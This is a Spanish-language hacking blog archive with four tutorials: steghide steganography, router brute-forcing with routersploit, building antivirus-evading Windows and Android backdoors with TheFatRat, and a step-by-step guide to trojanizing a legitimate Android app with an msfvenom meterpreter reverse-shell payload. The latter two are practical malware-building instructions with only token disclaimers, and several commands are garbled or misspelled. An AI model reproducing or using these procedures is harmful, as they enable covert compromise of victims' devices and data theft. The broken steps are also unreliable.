viernes, 28 de octubre de 2016

Tutorial steghide

Advertencia: Este post sólo es de carácter informativo. No usar con fines delictivos.

Hola a todos.

Hoy vamos a hacer un poquito de estenografía.

Utilizaremos steghide

para ello instalaremos

apt-get install steghide

Crearemos un archivo de texto



steghide embed -cf -ef texto



Nos pide una contraseña. La ponemos dos veces



El logo, como vemos, no se modifica.



Imaginaos que recibimos la foto y queremos saber si tiene algo escondido, para verlo basta con poner

steghide info logo_Celtas_Cortos.jpg

Darle a Sí y poner la contraseña.




Para extraer el archivo

steghide extract -sf logo_Celtas_Cortos.jpg

y ponemos la contraseña



Por favor:
  • Pincha en la publi.
  • Sígueme en las redes sociales:
    • twitter @manugomez1977
    • instagram @manugomez1977
    • facebook facebook.com/Manugomez1977

viernes, 21 de octubre de 2016

Tutorial routersploit

Hola a todos, hoy os presento routersploit

Routersploit es un framework que nos permite estudiar las vulnerabilidades de routers.

En primer lugar, instalamos

apt-get install routersploit




ejecutamos con

routersploit



Otra opción es descargarlo desde https://github.com/reverse-shell/routersploit.

Para ver los scanners que tiene, tecleamos

use scanner

y no presionamon intro, sino el tabulador.



Yo voy a poner

use scanner/autopwn/

porque mi router no es un dlink



show options



set target IP_OBJETIVO



exploit



Bueno, en mi caso, no es vulnerable a ninguno de los exploits.

Si hubiése sido vulnerable a un determinado exploit, tendría que poner

use exploit_de_la_vulnerabilidad

con use creds obtendremos los distintos módulos, los cuales permiten ataque por fuerza bruta.



Por ejemplo, vamos a usar

use creds/telnet_bruteforce

set target 192.168.1.1

exploit

(Bueno, en realidad, podemos personalizar el diccionario y los threads)



Podemos hacer fuerza bruta con telnet, ssh, ftp, http, snmp.

Happy hacking!!!!!!!!!


Por favor, recuerda que esta información es sólo para aprender, no para cometer actos delictivos. No me hago responsable del mal uso de la información contenida en este blog.

Sígueme en mis redes sociales, twitter @manugomez1977, instagram manugomez1977 y en la Página de facebook Manugomez1977.

viernes, 14 de octubre de 2016

Tutorial TheFatRat

Hola a todos.

Hoy vamos a presentar un script que va a ayudar a crearnos payloads con msvenom pero, que va a ser indetectable por muchos de los antivirus. Este script recibe el nombre de TheFatRat.

TheFatRat nos permitirá crear payloads tanto para windows como para android, además, lo podemos inyectar a un ejecutable.

En primer lugar, debemos instalar backdoor-factory (si no los tenemos ya instalados).

Apt-get install backdoor-factory

También deberemos instalar mingw32, para ello, si tenemos kali 2016, abrimos /etc/apt/sources.lists y añadimos

deb http://old.kali.org/kali sana main non-free contrib

Guardamos.

Escribimos en la terminal.

apt-get update

y ahora ponemos

apt-get install mingw32

Para los que tengan kali sana, basta con el apt-get install mingw32

El siguiente paso es descargarnos el script desde https://github.com/Screetsec/TheFatRat



descomprimimos donde queramos

unzip TheFatRat-master.zip

Damos permisos de ejecución

chmod +x fatrat

chmod +x powerfull.sh

Ejecutamos

./fatrat



Enter



Las salidas nos las guarda en el directorio output


Además, te crea los archivos para un autorun para usb/dvd, que sólo los tendrías que copiar en el usb/dvd víctima. Estos archivos se crearán en el directorio /autorun

Para cambiar los iconos para el autorun, los deberás copiar en el directorio /icons.

En la opción 1 crearemos un payload encriptado con msfvenom, y en ella tendremos para elegir.



En la opción 2 crearemos un backdoor para la arquitectura x86 de 32 bits para Windows, casi 100% indetectable. Eso sí, tarda mucho en generar el payload. Crea un programa en C con un payload (encriptado shikata ga nai) meterpreter reverse tcp. La salida constará de dos programas, Powerfull.exe y Powerfull-fud.exe.

La opción 3 crea un backdoor indetectable con AVOID v 1.2. Genera un payload con metasploit y nos da a elegir el tipo de binario.



El payload generado se guarda en una carpeta cuyo nombre coincidirá con el nombre que le hayamos puesto al payload. Los ficheros para el autorun estarán guardados en la carpeta autorun.

La opción 4 genera un payload y lo inyecta en otro archivo ejecutable, infectándolo, utilizando para ello backdoor factory. Nos ofrece unos cuantos payloads para inyectar.



Tras buscar los caves disponibles, nos pregunta cuál queremos usar para inyectar.



Los caves son huecos en el programa original en el cual se copiará el payload.

El ejecutable infectado se guardará en la carpeta /backdoored/output.

La opción 5 nos crea distintos listeners




Cada uno de los cuales nos da para elegir el payload que tendríamos que cargar.



Nos abrirá una terminal con el exploit multi handler de metasploit con la configuración con la que hemos configurado el listener.

La opción 6 nos abre metasploit.



La opción 7 usa searchsploit para buscar un exploit cualquiera dentro de nuestro equipo.



La opción 8 nos hace una limpieza de lo que hemos creado, borrando así los payloads.



La opción 9 nos abre la ayuda.



La opción 10 nos pone los créditos.



Happy Hacking.

Recordad que la idea de este blog es aprender, no enseñar a cometer ilegalidades.

Por favor, sígueme, además en las redes sociales:
  • Página de Facebook: Manugomez1977
  • twitter: @manugomez1977
  • instagram: @manugomez1977

Para poder seguir escribiendo posts, por favor, haz click en los anuncios.



viernes, 7 de octubre de 2016

Infectando apk


Hola a todos.

Antes de empezar, quiero, como ya sabréis, que todos estos posts son para fines educativos, y no me hago responsable del uso que hagáis con las informaciones contenidas en este blog.

Esto hay que señalarlo por lo delicada que es la información de este post.

Además, te invito a que me sigas tanto en twitter @manugomez1977, en instagram manugomez1977 y en facebook en la Página Manugomez1977. Así como a que pinches en la publicidad para poder seguir con los posts.

En el día de hoy vamos a ver cómo podremos infectar una app legítima de android con un payload hecho con msfvenom.

Podréis comprobar, según las capturas de pantalla, que me va a durar varios días, porque la cosa es un poquito larga.

En primer lugar, instalaremos la versión apktool de https://ibotpeaches.github.io/Apktool/install , da igual que tengamos la apktool instalada por defecto en nuestro Kali, ya que no va bien. En Kali 1 moto, no haría falta. Sólo hay que tener cuidado que cambian los parámetros.



Debéis seguir los pasos de instalación que tenéis. Lo obviaré porque está bien explicado.

Una vez instalado, estará en /usr/local/bin

Deberéis instalar también Android Studio. Lo podeís descargar de https://developer.android.com/studio/index.html .

Crearemos el payload

msfvenom -p android/meterpreter/reverse_https LHOST=192.168.1.134 LPORT=4895 -o meterpreter.apk



meteré meterpreter.apk y la app víctima, en mi caso pokemongo.apk (jajajaja) en la carpteta pokemongo (llamarla como queráis, es indiferente).

Ahora, descompilamos meterpreter.apk y pokemongo.apk

/usr/local/bin/apktool d -f -o payload /root/meterpreter.apk

Meterá los archivos dentro del directorio payload



/usr/local/bin/apktool d -f -o victima /root/meterpreter.apk

Meterá los archivos dentro del directorio victima



Nos vamos a /root/victima/smali/com y creamos el directorio metasploit.

Nos vamos a /root/victima/smali/com/metasploit y creamos el directorio stage.



Copiamos todos los archivos .smali de payload/smali/com/metasploit/stage y los pegamos en victima/smali/com/metasploit/stage



Abrimos el fichero AndroidManifest.xml de la aplicación víctima y buscamos una etiqueta <activity> que contenga las líneas

<action android:name=”android.intent.action.MAIN”/>
<category android:name=”android.intent.category.LAUNCHER”/>



En la misma etiqueta <activity>, buscamos android:name= .El valor de atributo estará detrás.

android:name=VALORDELATRIBUTO.

Nos fijaremos que, entre cada parámetro, va a haber dos puntos ':'.

La actividad main de la aplicación víctima será el valor del atributo, cambiando los dos puntos por /.

Por lo tanto, la actividad main, en nuestro caso, será

victima/smali/com/unity3d/player/UnityPlayerNativeActivity.smali



Abrimos ese fichero




Buscamos el método onCreate

;->onCreate(Landroid/os/Bundle;)V




No cerramos el fichero y, en otra terminal, abrimos el fichero

victima/smali/com/metasploit/stage/MainService.smali

Buscamos

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V



Copiamos esta línea y la pegamos justo debajo del método onCreate del fichero victima/smali/com/unity3d/player/UnityPlayerNativeActivity.smali



Guardamos (por supuesto).

Ahora, abrimos, por un lado

/victima/AndroidManifest.xml

y por otro

/payload/AndroidMainfest.xml

En la imagen de la izquierda veremos el AndroidManifest.xml de la aplicación víctima y en la derecha, el del payload



Copiamos los permisos del payload que no estén en los de la app víctima, en el AndroidManifest.xml de esta última. Ten cuidado de no repetirlos y de que no te falte ninguno, pues no funcionará. Hay que tener definidos TODOS los permisos.



Guardamos el último fichero y salimos.

Ahora queda recompilar la aplicación víctima (repito, en mi caso, pokemongo).

/usr/local/bin/apketool b /root/original



El archivo apk de la aplicación infectada se grabará en el directorio

/victima/dist/



Ahora, queda por firmar la app infectada, puesto que android sólo ejecuta apps firmadas.

jarsigner -verbose -keystore /root/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA /root/pokemongo/victima/dist/pokemongo.apk androiddebugkey

Si no funciona, quitar la parte de -sigalg
 
 



Para crear el debug.keystore:

Creamos el directorio /root/.android

keytool -genkey -v -keystore /root/.android/degug.keystore -storepass android -allias androiddebugkey -keypass android -dname “DN=Android Debug,O=Android,C=ES”


Happy hacking